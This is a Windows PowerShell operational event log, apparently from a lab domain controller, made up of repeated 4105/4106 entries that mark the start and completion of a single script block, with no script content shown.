ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469963
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469962
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469961
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469960
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469959
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469958
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469957
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469956
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469955
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469954
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469953
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469952
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469951
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469950
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469949
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469948
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469947
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469946
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469945
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469944
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469943
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469942
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469941
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469940
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469939
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469938
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469937
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469936
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469935
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469934
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469933
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469932
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469931
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469930
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469929
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469928
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469927
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469926
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469925
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469924
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469923
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469922
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469921
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469920
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469919
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469918
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469917
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469916
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469915
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469914
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469913
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469912
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469911
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469910
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469909
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
